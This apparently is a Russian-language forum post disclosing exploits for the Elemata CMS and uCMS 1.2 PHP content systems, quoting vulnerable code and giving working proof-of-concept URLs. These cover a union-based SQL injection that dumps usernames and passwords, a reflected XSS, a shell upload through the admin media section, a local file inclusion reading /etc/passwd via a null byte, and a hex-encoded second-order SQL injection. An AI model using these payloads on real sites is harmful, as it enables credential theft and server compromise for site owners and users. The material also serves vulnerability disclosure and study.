Elemata CMS
Сайт разработчика
Скачать
SQL-injection
Зависимости: magic_quotes_qpc = off
File: /functions/global.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
function[/COLOR][COLOR="#0000BB"]e_meta[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
...
[/COLOR][COLOR="#0000BB"]$query_meta[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM posts WHERE id = '[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$meta[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query_meta[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][COLOR="#0000BB"]$row_meta[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$meta[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"];
...
}[/COLOR][/COLOR]
PoC:
http://127.0.0.1/e/index.php?id=1'+and+1=0+union+select+1,2,3,4,5,con cat(username,0x3a,password),7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26+from+users+--+
Пассивная XSS
File: /themes/revive/search.php
PHP код:
PHP:
[COLOR="#000000"]...
You searched for "[COLOR="#0000BB"][/COLOR]"
...[/COLOR]
PoC:
http://127.0.0.1/e/index.php?s=alert('lol');
Заливка шелла
Зависимости: права администратора
В админ-панеле в разделе Media.
LFI
Зависимости: magic_quotes_qpc = off, и права администратора
File: /admin/content/themes.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]activate[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#FF8000"]//UPDATE THEME SETTINGS
[/COLOR][COLOR="#0000BB"]$a_folder[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'folder'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]mysql_select_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$database_default[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE settings SET theme = '[/COLOR][COLOR="#0000BB"]$a_folder[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);
}
...[/COLOR][/COLOR]
File: /index.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#FF8000"]//Include Theme
[/COLOR][COLOR="#0000BB"]mysql_select_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$database_default[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$theme[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM settings"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$row_theme[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$theme[/COLOR][COLOR="#007700"]);
include ([/COLOR][COLOR="#DD0000"]"themes/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row_theme[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'theme'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"/index.php"[/COLOR][COLOR="#007700"]);
...[/COLOR][/COLOR]
PoC:
http://127.0.0.1/e/admin/index.php?action=themes&cmd=activate&folder=../../../../../../../etc/passwd%00
Заходим на главную страницу и файл инклюдится. Меняем тему обратно на стандартную:
http://127.0.0.1/e/admin/index.php?action=themes&cmd=activate&folder=revive
uCMS v 1.2
Сайт разработчика
Скачать
SQL injection
Зависимости: magic_quotes_gpc = off
File: /content.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$current_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"pages WHERE id = '[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]id_page[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]' Limit 1"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$r_current_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$current_page[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$current_version_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"pages_lg WHERE id_page = '[/COLOR][COLOR="#0000BB"]$r_current_page[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]' AND id_lg = '[/COLOR][COLOR="#0000BB"]$r_current_language[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]' Limit 1"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$r_current_version_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$current_version_page[/COLOR][COLOR="#007700"]);
...
if([/COLOR][COLOR="#0000BB"]settings_site_name_display[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])
{
include([/COLOR][COLOR="#DD0000"]'modules/sitename/sitename.php'[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]settings_site_name_position[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$page_title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$mod_sitename_site_name[/COLOR][COLOR="#007700"].([/COLOR][COLOR="#0000BB"]$r_current_version_page[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]] ?[/COLOR][COLOR="#DD0000"]' - '[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]$r_current_version_page[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]];
elseif([/COLOR][COLOR="#0000BB"]settings_site_name_position[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$page_title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$r_current_version_page[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]].([/COLOR][COLOR="#0000BB"]$r_current_version_page[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]] ?[/COLOR][COLOR="#DD0000"]' - '[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]$mod_sitename_site_name[/COLOR][COLOR="#007700"];
}
else
[/COLOR][COLOR="#0000BB"]$page_title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$r_current_version_page[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]];
...[/COLOR][/COLOR]
Данные из первого запроса попадают во второй. Далее выводится переменная $page_title. PoC:
Код:
Code:
-1' union select 1,2,3,4,version(),6,7,8,9,10,11,12 -- d ==>
0x2D312720756E696F6E2073656C65637420312C322C332C342C76657273696F6E28292C362C372C382C392C31302C31312C3132202D2D2064
http://127.0.0.1/cms/index.php?id_page=-1'+union+select+0x2D312720756E696F6E2073656C65637420312C322C332C342C76657273696F6E28292C362C372C382C392C31302C31312C3132202D2D2064,2,3,4,5,6,7,8+--+